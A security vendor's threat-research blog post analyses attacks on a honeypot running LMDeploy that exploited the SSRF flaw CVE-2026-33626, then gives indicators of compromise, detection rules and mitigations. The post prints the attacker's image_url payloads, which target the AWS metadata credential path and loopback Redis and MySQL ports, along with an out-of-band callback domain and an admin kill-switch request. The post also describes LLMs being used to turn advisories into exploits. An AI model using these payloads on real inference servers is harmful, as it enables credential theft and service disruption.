< back to blog

CVE-2026-33626: How attackers exploited LMDeploy LLM Inference Engines in 12 hours

Sysdig Threat Research Team
CVE-2026-33626: How attackers exploited LMDeploy LLM Inference Engines in 12 hours
Published by:
Sysdig Threat Research Team
CVE-2026-33626: How attackers exploited LMDeploy LLM Inference Engines in 12 hours
Published:
April 22, 2026
falco feeds by sysdig

Falco Feeds extends the power of Falco by giving open source-focused companies access to expert-written rules that are continuously updated as new threats are discovered.

learn more
Green background with a circular icon on the left and three bullet points listing: Automatically detect threats, Eliminate rule maintenance, Stay compliant, with three black and white cursor arrows pointing at the text.

On April 21, 2026, GitHub published GHSA-6w67-hwm5-92mq, later assigned CVE-2026-33626, a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy. LMDeploy is a toolkit for serving vision-language and text large language models (LLMs) developed by Shanghai AI Laboratory, InternLM.

Within 12 hours and 31 minutes of its publication on the main GitHub advisory page, the Sysdig Threat Research Team (TRT) observed the first LMDeploy exploitation attempt against our honeypot fleet. The attacker did not simply validate the bug and move on. Instead, over a single eight-minute session, they used the vision-language image loader as a generic HTTP SSRF primitive to port-scan the internal network behind the model server: AWS Instance Metadata Service (IMDS), Redis, MySQL, a secondary HTTP administrative interface, and an out-of-band (OOB) DNS exfiltration endpoint.

The Sysdig TRT deployed a honeypot running a vulnerable LMDeploy instance shortly after the advisory went live. The malicious activity that followed shows how an attacker weaponizes a narrowly described SSRF against an AI-infrastructure tool such as LMDeploy.

Exploitation timeline

Time (UTC)

Event

April 18, 1509

Repository-level GitHub Security Advisory (GHSA) published*

April 20, 21:16

CVE-2026-33626 created in NVD

Apr 21, 15:04

GHSA-6w67-hwm5-92mq published on GitHub

Apr 22, 03:35

First exploitation attempt observed (from 103.116.72.119)

The gap between the indexed GHSA publication and the first exploitation was 12 hours and 31 minutes. No public proof-of-concept (PoC) code existed on GitHub or any major exploit repository at the time of the attack. As with several recent niche-target cases, the advisory text itself contained enough detail to construct a working exploit from scratch, including the affected file, parameter name, and the absence of scheme or host validation.

*NOTE: There is no straightforward way to search for repository-level GHSAs — they require monitoring specific repositories — so the Sysdig TRT does not include repository-level GHSA publication in our advisory-to-exploit 12-hour timeline. Instead, our clock begins when the advisory was published on the main GitHub advisory page.

The LMDeploy vulnerability

LMDeploy is a production inference toolkit that serves vision-language models (VLMs), such as InternVL2, internlm-xcomposer2, and Qwen2-VL, through an OpenAI-compatible HTTP API. When a chat completion request contains an image_url field, the server dereferences that URL and loads the image into the model's context. 

Below is the standard OpenAI vision-message shape:

{
  "model": "internlm-xcomposer2",
  "messages": [{
    "role": "user",
    "content": [
      {"type": "text", "text": "describe this"},
      {"type": "image_url", "image_url": {"url": "http://..."}}
    ]
  }]
}

As you can see, this code lacks a hostname resolution check, private-network blocklist, and protection for link-local addresses. Any URL with an http:// or https:// scheme — including http://169.254.169.254/, http://127.0.0.1:3306, or any RFC 1918 address — was fetched by the server and returned to the model, or in the case of a binary protocol like Redis or MySQL, returned enough of an error response to confirm the port was open.

The three phases of LMDeploy exploitation

Over the eight-minute session, 103.116.72.119 produced 10 distinct requests across three phases, alternating between two vision-language models, internlm-xcomposer2 and OpenGVLab/InternVL2-8B. Switching models mid-session suggests that the operator was aware that some VLMs refuse suspicious inputs and tests both models.

Phase 1: Cloud-metadata and Redis (03:35:22 to 03:37:45 UTC)

The attacker's first request targeted AWS IMDS directly:

POST /v1/chat/completions
model: internlm-xcomposer2
image_url: http://169.254.169.254/latest/meta-data/iam/security-credentials/

Two minutes later the attacker pivoted to the loopback Redis port:

image_url: http://127.0.0.1:6379

The choice of port 6379 is significant: It is the standard Redis port and a well-known post-IMDS target in SSRF chains. This SSRF primitive does not support arbitrary body content, but a successful connection on 6379 would confirm that Redis is present on the internal interface.

Phase 2: OOB callback and API enumeration (03:41:07 to 03:41:58 UTC)

Three minutes later the attacker tested egress with an out-of-band (OOB) DNS callback to requestrepo.com, a public OAST (out-of-band application security testing) service similar to Burp Collaborator and Project Discovery's interact.sh:

image_url: http[://]cw2mhnbd.requestrepo.com

On a vulnerable real-world LMDeploy instance with unrestricted egress, the attacker's requestrepo.com dashboard would receive an HTTP callback confirming both the SSRF and that the server can reach arbitrary external hosts. This is a standard blind-SSRF confirmation step.

Immediately after the OOB test, the attacker enumerated the API surface:

GET /
GET /openapi.json
POST /v1/chat/completions  (model: OpenGVLab/InternVL2-8B, no image_url)

The /openapi.json request is typical of an attacker reading the server's auto-generated OpenAPI schema to find additional endpoints beyond /v1/chat/completions. LMDeploy exposes several administrative endpoints under /distserve/* for its serving mode, which were almost certainly discovered here.

Phase 3: Admin-plane probe and localhost port sweep (03:42:35 to 03:43:53 UTC)

The attacker first probed the distributed-serving kill-switch:

POST /distserve/p2p_drop_connect
body: {}

The endpoint above tears down the ZMQ link to a named remote engine in a disaggregated LMDeploy cluster. The affected code calls self.zmq_disconnect(drop_conn_request.remote_engine_id) and returns {'success': True}. An attacker who knows or guesses a live remote_engine_id can disrupt the prefill/decode route for that peer, degrading or breaking inference flowing through it. In the affected versions, these endpoints had no authentication layer in the default configuration.

The attacker then returned to the SSRF primitive and systematically port-scanned the loopback interface over 36 seconds:

Time

Target URL

Likely service

03:43:17

http://127.0.0.1:8080

secondary HTTP / proxy admin

03:43:36

http://127.0.0.1:3306

MySQL

03:43:53

http://127.0.0.1

HTTP port 80

Three localhost probes in 36 seconds is the signature of a scripted port sweep using the SSRF as a probe primitive. The attacker is not looking for image files; they are instead treating the vision-LLM endpoint as a generic HTTP GET that can reach addresses the external network cannot. Every one of these URLs is blocked by the v0.12.3 _is_safe_url() check.

What this means for defenders

CVE-2026-33626 fits a pattern that we have observed repeatedly in the AI-infrastructure space over the past six months: critical vulnerabilities in inference servers, model gateways, and agent orchestration tools are being weaponized within hours of advisory publication, regardless of the size or extent of their install base. LMDeploy, for instance, has 7,798 GitHub stars, an order of magnitude less than mainstream projects like vLLM or Ollama, and it does not appear in CISA's Known Exploited Vulnerabilities (KEV) catalog.

The observed timeline extends the trend reported in the Zero Day Clock project and our own prior research on marimo's pre-auth RCE. Attackers are no longer waiting for mass-exploitation tools. The advisory text, read carefully, is enough to craft an exploit.

Generative AI (GenAI) is accelerating this collapse. An advisory as specific as GHSA-6w67-hwm5-92mq, which includes the affected file, parameter name, root-cause explanation, and sample vulnerable code, is effectively an input prompt for any commercial LLM to generate a potential exploit. We have recently observed and reported on this pattern across multiple recent niche-target exploitations: GHSA publishes, working exploit appears within hours, no public PoC existed. 

Any advisory that names the vulnerable function, shows the missing check, or quotes the affected code pattern, in the age of capable code-generation models, becomes a turnkey exploit. The irony that CVE-2026-33626's target is itself an LLM-serving framework is incidental; the same acceleration applies across the CVE landscape.

What distinguishes CVE-2026-33626 from a textbook SSRF is what the primitive unlocks on an AI-serving node:

  • IAM credentials and cloud metadata. Vision-LLM nodes typically run on GPU instances with broad IAM roles: S3 model artifacts, training datasets, and often cross-account assume-role. One successful IMDS fetch can compromise the cloud account.
  • In-cluster data stores. Inference deployments typically ship with Redis for prompt caching, MySQL or Postgres for metering, and internal HTTP control planes. The attacker's probes (127.0.0.1:6379, 127.0.0.1:3306, and 127.0.0.1:8080) map directly onto this topology.
  • Model-level denial of service. The distserve/p2p_drop_connect probe shows that the attacker understood LMDeploy's disaggregated-serving architecture: Tearing down the ZMQ link between prefill and decode engines disrupts inference on that route.
  • Generic HTTP primitive. Unlike remote code execution (RCE), this SSRF is a read-only HTTP client inside the victim's network, reachable from the public internet. For reconnaissance before a larger operation, this access is often a more valuable foothold than many code-execution bugs.

Combined with the lack of IP-level egress controls on many GPU-hosted environments, the class of bug seen with the LMDeploy vulnerability is particularly attractive.

Indicators of Compromise

Source IPs

IP

Location

ASN

103.116.72.119

Kowloon Bay, HK

AS400618 Prime Security Corp.

The source IP may be a proxy, VPN endpoint, or cloud instance rented for the operation rather than the operator's true origin.

Callback infrastructure

Domain

Purpose

cw2mhnbd.requestrepo.com

Out-of-band DNS/HTTP exfil subdomain provided by the requestrepo.com OAST service. The cw2mhnbd prefix is unique to this operator's session.

Target URLs fetched by the SSRF

URL

Classification

http://169.254.169.254/latest/meta-data/iam/security-credentials/

AWS IMDSv1: IAM role credential exfiltration

http://127.0.0.1:6379

Loopback Redis

http://127.0.0.1:3306

Loopback MySQL

http://127.0.0.1:8080

Loopback secondary HTTP

http://127.0.0.1

Loopback HTTP (port 80)

http[://]cw2mhnbd.requestrepo.com

Blind-SSRF OOB confirmation

Runtime detection

Runtime detection for this attack class sits in two layers: the application layer and the host layer. 

At the application layer, any inference server that fetches URLs from user-supplied content should log the resolved IP of every outbound request and alert on requests to link-local (169.254.0.0/16), loopback (127.0.0.0/8, ::1), or RFC 1918 private ranges, as well as well-known service ports on those ranges (6379 Redis, 3306 MySQL, 5432 Postgres, 9200 Elasticsearch, 2375/2376 Docker). At the host layer, runtime detection captures the post-exploitation symptom (an outbound connection to a cloud metadata endpoint from an inference process) regardless of framework. 

Sysdig Secure ships several out-of-the-box Falco rules that fire on exactly the URLs the attacker attempted. Teams running Sysdig Secure on GPU and inference nodes should enable these detection rules for vision-language and agent tool-use workloads:

•   Contact EC2 Instance Metadata Service From Container
•   Contact EC2 Instance Metadata Service From Host
•   Contact GCP Instance Metadata Service From Container
•   Contact GCP Instance Metadata Service From Host
•   Contact Azure Instance Metadata Service From Container
•   Contact Azure Instance Metadata Service From Host
•   Contact Task Metadata Endpoint

On a vulnerable real-world LMDeploy instance, the attacker's first request to the IMDS endpoint would trigger the rule Contact EC2 Instance Metadata Service From Container the moment the server-side requests.get() reached the IMDS endpoint, independent of any application-layer logging. 

The GCP and Azure rules fire the same way for victims running on those clouds, and Contact Task Metadata Endpoint covers ECS/Fargate workloads where IMDS lives at 169.254.170.2, rather than 169.254.169.254.

Recommendations

  • Assume breach.
  • Update LMDeploy to v0.12.3 or later. If upgrading is not possible, front the inference API with a reverse proxy that strips or rewrites image_url values, or disable vision-model endpoints entirely.
  • Enforce IMDSv2 on inference nodes. Set httpTokens=required to disable IMDSv1. This is the single highest-ROI control for this class of bug: a requests.get() SSRF primitive cannot acquire the required session token (no way to issue a PUT /latest/api/token first). Pair with httpPutResponseHopLimit=1 to prevent containers reaching IMDS via the default bridge network.
  • Restrict outbound egress from inference servers at the VPC/SG level. Inference nodes should only reach model-artifact storage (S3, GCS) and logging endpoints.
  • Rotate any IAM role credentials attached to publicly reachable LMDeploy deployments version 0.12.2 or earlier. 
  • Audit internal service exposure on inference nodes. Redis, MySQL, and admin control planes should bind to a private interface only when genuinely required by the model server, and must require authentication regardless.
  • Monitor outbound connections from inference processes to link-local, RFC 1918, or loopback addresses. These should be zero in normal operation.
  • Inventory AI-infrastructure tooling. Model-serving platforms (LMDeploy, vLLM, TGI, Ray Serve) are frequently deployed outside standard security review and often not covered by CVE scanning until well after disclosure.

Conclusion

CVE-2026-33626 fits a consistent pattern: inference and agent-framework SSRF bugs weaponized within hours of GHSA publication, by operators who build from the advisory rather than wait for a public PoC. Twelve hours and 31 minutes from publication to the first observed exploitation of LMDeploy is short enough that “patch Tuesday” cadences and monthly scans are not a sufficient control. The attacker did not merely validate the bug, but they used it as a port-scanning primitive in a single eight-minute session.

For defenders running AI infrastructure, vision-LLM image loaders, agent tool-use endpoints, and RAG fetchers are all SSRF candidates by default unless explicit egress filtering is applied. Runtime detection on the inference host, strict VPC egress controls, and rapid-patch response remain the most effective controls when the weaponization window is measured in hours.

About the author

Cloud detection & response
Security for AI
Cloud Security
featured resources

Test drive the right way to defend the cloud
with a security expert